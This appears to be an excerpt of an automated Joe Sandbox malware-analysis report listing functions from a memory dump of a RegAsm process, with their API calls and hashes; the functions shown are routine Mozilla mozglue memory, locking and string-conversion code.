                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: SHGetKnownFolderPath$shell32
                                                                                    • API String ID: 2574300362-1045111711
                                                                                    • Opcode ID: 4878ca468916bd1a12e8ea52bf4a802552f073e17f74e5113ddfdb5dfcbb4441
                                                                                    • Instruction ID: 6f645b151ac1e8c7d30511b5fb32a07a81342efeeca79006db3bc2cb16cab3b3
                                                                                    • Opcode Fuzzy Hash: 4878ca468916bd1a12e8ea52bf4a802552f073e17f74e5113ddfdb5dfcbb4441
                                                                                    • Instruction Fuzzy Hash: 73015E717012199FCB00DF6ADC48AABBBF8FF8A758B504529E849D7600D730AA04CBA5
                                                                                    Function 6C70E550 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70E577
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70E584
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70E5DE
                                                                                    • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C70E8A6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
                                                                                    • String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
                                                                                    • API String ID: 1483687287-53385798
                                                                                    • Opcode ID: 7cfaff276f5bb1f02bbf8f9cd792f910f7c6fb10aff9e9b85847d126eece7d46
                                                                                    • Instruction ID: 721a40f2e4d1c2abe38616b4b2c2bd23983404d9113613b35b38a68966ccf234
                                                                                    • Opcode Fuzzy Hash: 7cfaff276f5bb1f02bbf8f9cd792f910f7c6fb10aff9e9b85847d126eece7d46
                                                                                    • Instruction Fuzzy Hash: 9211A131704658DFCB00AF19C948A6ABBF4FBC932CF44863AE8A547650DB70A805CBD5
                                                                                    Function 6C710C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C710CD5
                                                                                      • Part of subcall function 6C6FF960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C6FF9A7
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C710D40
                                                                                    • free.MOZGLUE ref: 6C710DCB
                                                                                      • Part of subcall function 6C6E5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C6E5EDB
                                                                                      • Part of subcall function 6C6E5E90: memset.VCRUNTIME140(ewrl,000000E5,?), ref: 6C6E5F27
                                                                                      • Part of subcall function 6C6E5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C6E5FB2
                                                                                    • free.MOZGLUE ref: 6C710DDD
                                                                                    • free.MOZGLUE ref: 6C710DF2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
                                                                                    • String ID:
                                                                                    • API String ID: 4069420150-0
                                                                                    • Opcode ID: 8471e9a401c2b464f40c202c738c439dd18d6f7e2e16428ca70b7087d588feab
                                                                                    • Instruction ID: f9f647e4669ce103dc1ba4d9b7601624968755b5cef4ecad73c480eebfa4cd3d
                                                                                    • Opcode Fuzzy Hash: 8471e9a401c2b464f40c202c738c439dd18d6f7e2e16428ca70b7087d588feab
                                                                                    • Instruction Fuzzy Hash: 8E41357191D7808BD320CF29C2817AAFBE5BFC9714F148A2EE8D887B51DB709455CB82
                                                                                    Function 6C719120 Relevance: 6.3, APIs: 5, Instructions: 98COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C718242,?,00000000,?,6C70B63F), ref: 6C719188
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C718242,?,00000000,?,6C70B63F), ref: 6C7191BB
                                                                                    • memcpy.VCRUNTIME140(00000000,00000008,0000000F,?,?,6C718242,?,00000000,?,6C70B63F), ref: 6C7191EB
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C718242,?,00000000,?,6C70B63F), ref: 6C719200
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6C718242,?,00000000,?,6C70B63F), ref: 6C719219
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: malloc$freememcpy
                                                                                    • String ID:
                                                                                    • API String ID: 4259248891-0
                                                                                    • Opcode ID: 78723270952b4e2af39980cbcd8180d9301a67d173ad0b23d17430183da6495a
                                                                                    • Instruction ID: 343a961d10ab7e93d56316d3ea92a7286003f8df3ad8a25271d4caa385bc38cd
                                                                                    • Opcode Fuzzy Hash: 78723270952b4e2af39980cbcd8180d9301a67d173ad0b23d17430183da6495a
                                                                                    • Instruction Fuzzy Hash: 3B319731A046058FEB00DF68CC4436A73E5EFA1316F188639D846CBA40FB31E94ACBA1
                                                                                    Function 6C700800 Relevance: 6.3, APIs: 5, Instructions: 71COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(6C74E7DC), ref: 6C700838
                                                                                    • memset.VCRUNTIME140(?,00000000,00000158), ref: 6C70084C
                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 6C7008AF
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 6C7008BD
                                                                                    • LeaveCriticalSection.KERNEL32(6C74E7DC), ref: 6C7008D5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterLeave$memset
                                                                                    • String ID:
                                                                                    • API String ID: 837921583-0
                                                                                    • Opcode ID: 0682fa5cbf815f143bf0eb3d10087d6b4dba3f49949bb5508c1796324c15da97
                                                                                    • Instruction ID: de45eca17b62556ca61f789c09b68c50c94dbfe465fa8ac381915ae4d19c138e
                                                                                    • Opcode Fuzzy Hash: 0682fa5cbf815f143bf0eb3d10087d6b4dba3f49949bb5508c1796324c15da97
                                                                                    • Instruction Fuzzy Hash: EB21F271B0120D8BEF04DF76D948BAEB7B9BF85728F504539D519A7A80DF31A9048BD0
                                                                                    Function 6C71CCF0 Relevance: 6.3, APIs: 4, Instructions: 299COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C70DA31,00100000,?,?,00000000,?), ref: 6C71CDA4
                                                                                      • Part of subcall function 6C6DCA10: malloc.MOZGLUE(?), ref: 6C6DCA26
                                                                                      • Part of subcall function 6C71D130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C71CDBA,00100000,?,00000000,?,6C70DA31,00100000,?,?,00000000,?), ref: 6C71D158
                                                                                      • Part of subcall function 6C71D130: InitializeConditionVariable.KERNEL32(00000098,?,6C71CDBA,00100000,?,00000000,?,6C70DA31,00100000,?,?,00000000,?), ref: 6C71D177
                                                                                    • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C70DA31,00100000,?,?,00000000,?), ref: 6C71CDC4
                                                                                      • Part of subcall function 6C717480: ReleaseSRWLockExclusive.KERNEL32(?,6C7215FC,?,?,?,?,6C7215FC,?), ref: 6C7174EB
                                                                                    • moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C70DA31,00100000,?,?,00000000,?), ref: 6C71CECC
                                                                                      • Part of subcall function 6C6DCA10: mozalloc_abort.MOZGLUE(?), ref: 6C6DCAA2
                                                                                      • Part of subcall function 6C70CB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C71CEEA,?,?,?,?,00000000,?,6C70DA31,00100000,?,?,00000000), ref: 6C70CB57
                                                                                      • Part of subcall function 6C70CB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C70CBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C71CEEA,?,?), ref: 6C70CBAF
                                                                                    • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C70DA31,00100000,?,?,00000000,?), ref: 6C71D058
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
                                                                                    • String ID:
                                                                                    • API String ID: 861561044-0
                                                                                    • Opcode ID: 359c082373256d45a94ca7d88f8268fe211032db9b4812e96e507071ec128b4a
                                                                                    • Instruction ID: 4f8ecc921eca2729bf4f62706ba8efab6fdc0a4e8dd40e1ee6431883f1c7ac9a
                                                                                    • Opcode Fuzzy Hash: 359c082373256d45a94ca7d88f8268fe211032db9b4812e96e507071ec128b4a
                                                                                    • Instruction Fuzzy Hash: 13D18071A04B469FD708CF28C580B99F7E1BF99308F05866DD8598BB12EB31F965CB81
                                                                                    Function 6C6D1720 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C6D17B2
                                                                                    • memset.VCRUNTIME140(?,00000000,?,?), ref: 6C6D18EE
                                                                                    • free.MOZGLUE(?), ref: 6C6D1911
                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C6D194C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturnfreememcpymemset
                                                                                    • String ID:
                                                                                    • API String ID: 3725304770-0
                                                                                    • Opcode ID: b553bb855293fbd28bb1d51aa6bbe2e8d8120c3f76e0635737e0bcdc71728e34
                                                                                    • Instruction ID: 98c5dc5529148ac1fbcc1a9944702433443213538894e013168e2c09d68a301a
                                                                                    • Opcode Fuzzy Hash: b553bb855293fbd28bb1d51aa6bbe2e8d8120c3f76e0635737e0bcdc71728e34
                                                                                    • Instruction Fuzzy Hash: 6481D070A15205DFCB08CF68D8849EEBBB2FF89324F05462DE815AB750D770E844CBA6
                                                                                    Function 6C6E5C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetTickCount64.KERNEL32 ref: 6C6E5D40
                                                                                    • EnterCriticalSection.KERNEL32(6C74F688), ref: 6C6E5D67
                                                                                    • __aulldiv.LIBCMT ref: 6C6E5DB4
                                                                                    • LeaveCriticalSection.KERNEL32(6C74F688), ref: 6C6E5DED
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                                    • String ID:
                                                                                    • API String ID: 557828605-0
                                                                                    • Opcode ID: c3c37be68ecc293cbdecb8f7a5dc84705a6f9b08db7391c6e245e551a8e8e497
                                                                                    • Instruction ID: 0232fe880aeaa34ddf9665a33668bda5eb156205a6870b18acc88820bb8b937d
                                                                                    • Opcode Fuzzy Hash: c3c37be68ecc293cbdecb8f7a5dc84705a6f9b08db7391c6e245e551a8e8e497
                                                                                    • Instruction Fuzzy Hash: A4518171E051298FCF08DF68C854ABEBBF2FB89318F29862EC815A7750C7306945CB95
                                                                                    Function 6C727170 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetTickCount64.KERNEL32 ref: 6C727250
                                                                                    • EnterCriticalSection.KERNEL32(6C74F688), ref: 6C727277
                                                                                    • __aulldiv.LIBCMT ref: 6C7272C4
                                                                                    • LeaveCriticalSection.KERNEL32(6C74F688), ref: 6C7272F7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                                    • String ID:
                                                                                    • API String ID: 557828605-0
                                                                                    • Opcode ID: bafe37c99ee1ce7aaeee6419be27a95a1806fc1a06a4bb7504e3c8ead33cd654
                                                                                    • Instruction ID: 64524f588953639e66abd11277133d1580b6c216cc9afeeef6e72a9d022c4a0d
                                                                                    • Opcode Fuzzy Hash: bafe37c99ee1ce7aaeee6419be27a95a1806fc1a06a4bb7504e3c8ead33cd654
                                                                                    • Instruction Fuzzy Hash: A4519F71E011298FCF08DFA8CA94ABEBBB1FB89308F15C62AD815A7751C7346D45CB91
                                                                                    Function 6C6CCDF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 128COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6CCEBD
                                                                                    • memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C6CCEF5
                                                                                    • memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C6CCF4E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: memcpy$memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 438689982-4108050209
                                                                                    • Opcode ID: 11144fd202b18ea6348056dbb26b671d2ecee72f68b3c14f70122ad2fa3c7207
                                                                                    • Instruction ID: c75ebe45896f14fd9bb33fcbd6b8e8cf6c43e0438abedb15511491804cd64319
                                                                                    • Opcode Fuzzy Hash: 11144fd202b18ea6348056dbb26b671d2ecee72f68b3c14f70122ad2fa3c7207
                                                                                    • Instruction Fuzzy Hash: 39511575A0026A8FCB00CF18C890A9AFBB5EF99304F19859DD85A5F352D731ED06CBE1
                                                                                    Function 6C7277D0 Relevance: 6.1, APIs: 4, Instructions: 113stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7277FA
                                                                                    • ?StringToDouble@StringToDoubleConverter@double_conversion@@QBENPBDHPAH@Z.MOZGLUE(00000001,00000000,?), ref: 6C727829
                                                                                      • Part of subcall function 6C6FCC38: GetCurrentProcess.KERNEL32(?,?,?,?,6C6C31A7), ref: 6C6FCC45
                                                                                      • Part of subcall function 6C6FCC38: TerminateProcess.KERNEL32(00000000,00000003,?,?,?,?,6C6C31A7), ref: 6C6FCC4E
                                                                                    • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C72789F
                                                                                    • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C7278CF
                                                                                      • Part of subcall function 6C6C4DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C6C4E5A
                                                                                      • Part of subcall function 6C6C4DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C6C4E97
                                                                                      • Part of subcall function 6C6C4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C703EBD,6C703EBD,00000000), ref: 6C6C42A9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$Double$Converter@double_conversion@@$DtoaProcessstrlen$Ascii@Builder@2@Builder@2@@Converter@CreateCurrentDecimalDouble@EcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestTerminateV12@
                                                                                    • String ID:
                                                                                    • API String ID: 2525797420-0
                                                                                    • Opcode ID: b944f211e1100f55f1cfaaead0eebc694a27b781e0d5452bdd76daa10bf90571
                                                                                    • Instruction ID: e27dca255317756e80a28f28f96097619ab8f7a7e2ce2d0c84e6430f97460c06
                                                                                    • Opcode Fuzzy Hash: b944f211e1100f55f1cfaaead0eebc694a27b781e0d5452bdd76daa10bf90571
                                                                                    • Instruction Fuzzy Hash: AA41AC719047069BD300DF29C48056AFBF4FFCA268F204A2EE4A987641DB71E55ACBD6
                                                                                    Function 6C706470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C7082BC,?,?), ref: 6C70649B
                                                                                      • Part of subcall function 6C6DCA10: malloc.MOZGLUE(?), ref: 6C6DCA26
                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7064A9
                                                                                      • Part of subcall function 6C6FFA80: GetCurrentThreadId.KERNEL32 ref: 6C6FFA8D
                                                                                      • Part of subcall function 6C6FFA80: AcquireSRWLockExclusive.KERNEL32(6C74F448), ref: 6C6FFA99
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C70653F
                                                                                    • free.MOZGLUE(?), ref: 6C70655A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
                                                                                    • String ID:
                                                                                    • API String ID: 3596744550-0
                                                                                    • Opcode ID: 52a7eb2bf39428960083fcd5e2b8e60d51470de87b1407aa166281720b464830
                                                                                    • Instruction ID: 1e077e6f7c6606f41f2bf2dc37d7bce1a73c65009d9ba5aaeed6b9a49e1f986e
                                                                                    • Opcode Fuzzy Hash: 52a7eb2bf39428960083fcd5e2b8e60d51470de87b1407aa166281720b464830
                                                                                    • Instruction Fuzzy Hash: 113181B5A043159FC700CF14D994A9AB7E4BF89314F40842EE85A87741EB30EA19CB96
                                                                                    Function 6C6FFF60 Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memcpy.VCRUNTIME140(00000000,?,80000001,80000000,?,6C71D019,?,?,?,?,?,00000000,?,6C70DA31,00100000,?), ref: 6C6FFFD3
                                                                                    • memcpy.VCRUNTIME140(00000000,?,?,?,6C71D019,?,?,?,?,?,00000000,?,6C70DA31,00100000,?,?), ref: 6C6FFFF5
                                                                                    • free.MOZGLUE(?,?,?,?,?,6C71D019,?,?,?,?,?,00000000,?,6C70DA31,00100000,?), ref: 6C70001B
                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,6C71D019,?,?,?,?,?,00000000,?,6C70DA31,00100000,?,?), ref: 6C70002A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: memcpy$_invalid_parameter_noinfo_noreturnfree
                                                                                    • String ID:
                                                                                    • API String ID: 826125452-0
                                                                                    • Opcode ID: b50f01632a95564f50b15b1833aedc707f57c8aa2578a1b1b8be2aeed9b0c5ab
                                                                                    • Instruction ID: 1613443028812e8aed2824272e022a785359cd08a6eed25e799e7e9fe17d819a
                                                                                    • Opcode Fuzzy Hash: b50f01632a95564f50b15b1833aedc707f57c8aa2578a1b1b8be2aeed9b0c5ab
                                                                                    • Instruction Fuzzy Hash: 2F21D6B2B002155BD7089E78DC948AFB7FAFB853247250738E425D7780EB70AD0287D6
                                                                                    Function 6C6DB4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C6DB4F5
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C6DB502
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C6DB542
                                                                                    • free.MOZGLUE(?), ref: 6C6DB578
                                                                                    Memory Dump Source
